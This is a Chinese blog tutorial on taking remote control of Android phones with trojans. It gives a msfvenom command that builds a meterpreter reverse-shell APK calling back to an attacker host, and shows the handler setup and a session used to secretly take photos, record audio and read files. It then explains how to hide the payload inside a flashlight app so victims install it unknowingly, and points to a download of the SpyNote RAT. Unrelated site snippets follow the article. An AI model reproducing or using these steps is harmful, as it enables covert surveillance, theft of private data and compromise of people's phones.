news 2026/4/22 21:49:53

【黑客教程】利用木马远程控制目标手机

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
【黑客教程】利用木马远程控制目标手机

【黑客教程】利用木马远程控制目标手机

1.实验涉及复现环境


Kali平台(Hack):192.168.0.101

Android模拟器(靶机1):192.168.0.106

Android魅族note2手机(靶机2):192.168.0.104

Java环境,.net环境构建 。(spyNote软件需要环境)

2.环境配置二Android模拟器

2.1首先从官网上下载雷电模拟器

2.2下载完后。

点击.exe文件直接运行安装,运行,下一步,直接完成安装。

**2.3 安装完成后在电脑桌面显示下面logo
**

2.4 对模拟器网络进行配置在右边的设置里面选择设置>网络设置>网络桥接模式开启,ip设置dhcp,最下面点击安装:

2.5 安装成功后显示安装成功:

3.生成后门


3.1打开虚拟机,启动kali,打开终端,生成apk后门。

lhost为windows的ip(可以根据自己的IP设定),lport指定一个端口5001。

打开终端输入命令:

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.0.101 lport=5001 R > /etc/222.apk

(生成apk文件)

3.2生成文件后我们到/etc/222.apk目录下,

拷贝我们的apk文件,

到我们的windows平台下,然后启动我们的雷电模拟器,点击启动:

(启动界面)

3.3在右下角有个apk,点击选择文件安装。

3.4然后为了测试我们使用模拟器安装apk文件:

(成功安装木马文件)

4 使用metasploit控制台对模拟器进行攻击:

4.1 启动metasploit:

(启动界面)

4.2 使用模块:use exploit/multi/handler

(设置exploit)

4.3 设置模块set payload android/meterpreter/reverse_tcp

(paload设置)

4.4 设置攻击机和端口号和启动:

(参数配置)

4.5 显示正在监听靶机:

(监听中)

4.6 回到我们的模拟器靶机,我们点击运行我们安装的文件

(双击运行)

4.7 看到成功返回shell

(返回shell)

4.8 查看模拟手机的版本信息:sysinfo

(手机操作系统信息)

4.9 返回我们的模拟器,启动虚拟终端,查看攻击机和靶机的建立的联系:

(靶机被控的联系)

5 启用真机测试


5.1 步骤如以上环境,我在自己的手机上安装这个apk文件:

(note2手机安装)

5.2 按照上面获取shell的方法成功连接真机.:

(连接真机成功)

5.3 手机攻击演示:获取版本信息:

(手机版本信息)

5.4查看网络信息:(ifconfig)

(手机网络状态)

5.5查看root状态:

(显示手机未root)

5.6 启用网页视屏聊天:

(手机未找到合适的浏览器打开)

5.7查看手机有几个摄像头

(显示有2个)

5.8进行调用摄像头偷拍(默认前置摄像头):

**5.9网页摄像机视屏流,**显示实时画面能够调用摄像头,实时观看被攻击者的像机对着的物体,以下为通过此办法获取到的一段图片资料:

5.10 进行录音操作:

(成功录音并保存)

5.11 获得shell后有很多的攻击方法,我就不一一操作,将其汇总如下:

(网络和系统信息获取)

(系统命令执行和摄像头操作)

6 远控升级之捆绑app:


说明:现实生活中没有人会傻乎乎的下载个木马apk文件呀,所以我们的通过一些伪装的办法,将apk木马文件捆绑在用户常用的App上,诱导用户下载使用。

步骤如下:

先捋一下思路,把PAYLOAD小马注入到一个目标apk文件中,关键是要找到目标APK的入口,并把启动payload小马的代码添加进去,随目标APK一起启动,从而实现监听手机的目的。当然前提是apk文件可逆。

这里使用注入目标apk文件:手电筒—-魅族市场下载的(名为shoudiantong.apk)。我们使用上文攻击魅族手机用到的222.apk文件。

6.1 反编译payload小马222.apk和shoudiantong.apk

(说明:反编译软件kali系统中自带,以下操作在windows,所以需要下载一个apktool。

命令:

apktool d houmen.apk

apktool d shoudiantong.apk

(反编译生成两个新文件)

6.2 开始寻找手电筒shoudiantong.apk文件的入口,

在手电筒shoudiantong的Manifest.xml文件中查找Main和Launch关键词,定位到所对应的启动smail文件

**
**

6.3 直接搜索onCreat函数,找到bundle对象,你并在下面添加启动paload添加如下代码:(改动文件:MainActivety.smail)

6.4 点击保存之后呢,我们还要把刚才反编译的payload文件中的smail代码复制过来,把payload的smail/com/metasploit文件复制到手电筒的smail/com/目录下。

6.5 回编译:apktool b shoudiantong.apk

6.6 签名,这一部需要完成,发现没有签名的apk文件安装时会解析错误

生成KEYSTORE:keytool -genkey -v -keystore mykey.keystore -alias alias_name -keyalg RSA -keysize 1024 -validity 22222

因为我在本机没有这个工具,所以在kali系统完成:

6.7 给shoudiantong.apk签名:

6.8 Shoudiantong.apk木马文件测试,将手电筒apk文件装在手机上:

6.9 打开并正常使用完全没问题:

7 进行手机攻击


7.1 查看手机与攻击机建立的联系

7.2 试着操作一些上述没有操作过的命令试试:

7.3 查看路由信息:

7.4 ps查看进程:

8 总结:


通过对手机木马文件对手机的植入,我们可以成功的对手机进行控制,其中包括对手机使用者进行录音、拍照、查看下载手机私密文件,获取手机网络信息,进程信息等。

实现对手机的完全控制。

本文简单介绍如何将木马文件绑定到正常app实现对受害者攻击,其实还有很多办法,如通过中间人、钓鱼实现木马植入等。

9 图形界面控制软件SpyNote的使用

10 环境配置三java环境和.net环境:

11 spynote安装使用

11.1百度搜索“spynote下载”找到相应的安装包,或者访问地址:

(http://www.rekings.com/spynote-v5-android-rat/)

进行下载下载后使用解压密码:rekings.com打开:

11.2 双击运行软件出现以下界面填写一个大于1023的端口,默认2222

(填写端口)

11.3配置生成木马apk文件,

我这里配置端口:222我们的攻击机为:192.168.0.100也就是我计算机的ip,然后应用的名字test,点击上方的build就可以生成文件:

11.4演示过程涉及一些个人隐私,

所以在演示的过程中我们用上面实验中用到的手机模拟器来代替打开我们的雷电模拟器,点击右下角的apk安装,把我们生成的apk文件安装

(test.apk文件默认放在C:\Administrator\output):

(安装apk文件)

12 攻击演示:

12.1 回到spyNote软件,我们发现有一台机器成功上线:

12.2 在设备上右击选择 tools P依次有一些命令执行:

(攻击方式)

12.3 我们选择tools p>record calls得到手机的通话记录

(通话记录)

12.4 我们选择tools p>record calls得到手机的通话记录install aplications查看手机的安装的应用软件:

**(安装的软件)
**

12.5 我们选择tools p>file managerke可以查看手机里面的文件,可以任意下载,拷贝,删除等等。

(文件管理)

12.6 我们选择tools p>romote commands可以进行远程终端管理:

(远程终端管理)

13 总结:


功能太多,不一一演示,其中还包括照相、监听电话声音、查看通讯录、发送短信等等一些功能,等于自己手机咯都不用买手机

喜欢的小伙伴记得三连击!!!

免责声明:本文旨在传递更多市场信息,不构成任何投资建议和其他非法用途。文章仅代表作者观点,不代表手机电脑双黑客立场。以上文章之对于正确的用途,仅适用于学习。

文章来源于网上,如有侵权请联系博主删除

网安学习资源分享

网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我们和网安大厂360共同研发的的网安视频教程,内容涵盖了入门必备的操作系统、计算机网络和编程语言等初级知识,而且包含了中级的各种渗透技术,并且还有后期的CTF对抗、区块链安全等高阶技术。总共200多节视频,100多本网安电子书,最新学习路线图和工具安装包都有,不用担心学不全。

🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/4/21 21:58:33

毕设分享 yolov11医学影像脑瘤检测识别系统

文章目录 0 前言1 项目运行效果2 课题背景2.1. 医学诊断现状与挑战2.2. 人工智能技术的发展与应用2.3. 行业痛点与技术解决方案2.4. 研究意义与社会价值 3 设计框架3.1. 系统总体架构3.2. 技术方案详述3.2.1 YOLOv11模型训练模块3.2.2 PyQt5交互系统设计3.2.3 结果可视化模块 3…

作者头像 李华
网站建设 2026/4/23 13:57:43

java+vue基于springboot高校大学生党建学习系统 思想汇报系统_up89hv00

目录技术栈与框架选择系统功能模块权限与角色管理技术实现细节特色与创新点部署与维护开发技术源码文档获取/同行可拿货,招校园代理 :文章底部获取博主联系方式!技术栈与框架选择 采用SpringBoot作为后端框架,简化配置并提供快速开发能力。V…

作者头像 李华
网站建设 2026/4/23 15:28:08

java+vue基于springboot高校毕业生公职资讯系统 考公辅导系统_g37fpyx5

目录 高校毕业生公职资讯系统(考公辅导系统)概述核心功能模块技术实现要点部署与扩展性 开发技术源码文档获取/同行可拿货,招校园代理 :文章底部获取博主联系方式! 高校毕业生公职资讯系统(考公辅导系统)概…

作者头像 李华
网站建设 2026/4/23 12:24:21

论文开题“通关秘籍”:书匠策AI带你解锁高效写作新姿势

对于每一位踏上学术征程的研究者来说,撰写开题报告就像是一场“闯关游戏”——选题要新颖独特、文献综述要全面深入、研究规划要科学合理、格式规范要一丝不苟。但现实往往是,许多人在选题阶段就陷入“迷雾”,文献综述时被海量信息淹没&#…

作者头像 李华